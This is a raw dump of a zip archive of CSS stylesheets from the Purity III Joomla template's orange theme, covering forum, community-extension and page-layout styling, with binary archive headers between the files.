#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-left: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: left;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  display: table;
  content: " ";
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-right: 5px;
  margin-bottom: 10px;
  float: left;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: right;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-right: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-right: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-left: 1px solid #eeeeee;
  margin-left: -1px;
  padding-left: 20px;
  padding-right: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: right;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  display: table;
  content: " ";
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-left: 10px;
  padding-right: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .wysibb-toolbar {
  min-height: 34px;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-right: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #ff8800;
  color: #ff8800;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #ff8800;
  border-color: #ff8800;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  display: table;
  content: " ";
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: left;
}
#kunena.layout ul.pagination li + li {
  border-left: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  filter: alpha(opacity=40);
  opacity: 0.4;
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-left: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}
.view-topic body.modal-open {
  overflow: auto;
}
.com_kunena #t3-mainnav {
  padding: 0;
}
.com_kunena #t3-mainnav .t3-navbar {
  display: inline-block;
  flex: 1;
}
.com_kunena .t3-megamenu .navbar-nav {
  flex-direction: row;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-menu {
  position: absolute;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-toggle::after {
  display: none;
}
.com_kunena .tab-pane.show {
  opacity: 1;
}PKӜ�\+e���7purity_iii/css/themes/orange/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKӜ�\*�ن>>5purity_iii/css/themes/orange/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-right: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-left: 15px;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-left: 20px;
}PKӜ�\7purity_iii/css/themes/orange/layouts/features-intro.cssnu&1i�PKӜ�\�yq�1purity_iii/css/themes/orange/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #ff8800;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  right: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKӜ�\M�J��1purity_iii/css/themes/orange/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  display: table;
  content: " ";
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  left: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #ff8800;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-right: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKӜ�\�.��2purity_iii/css/themes/orange/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKӜ�\��T��-purity_iii/css/themes/orange/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #ff8800;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKӜ�\�u��-purity_iii/css/themes/orange/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-right: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  .blog .blog-item .item-image.pull-left {
    float: none !important;
  }
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #b35f00;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKӜ�\Z���X�X)purity_iii/css/themes/orange/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: left;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #ff8800;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #b35f00;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: left;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #ff8800;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: left;
}
.text-right {
  text-align: right;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-left: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-left: 0;
  list-style: none;
}
.list-inline {
  padding-left: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-left: 5px;
  padding-right: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-left: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: left;
    width: 160px;
    clear: left;
    text-align: right;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-left: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    display: table;
    content: " ";
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-left: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-right: 15px;
  padding-left: 0;
  border-right: 5px solid #eeeeee;
  border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: right;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:focus,
.btn-inverse.focus {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #000000;
}
.btn-inverse:hover {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
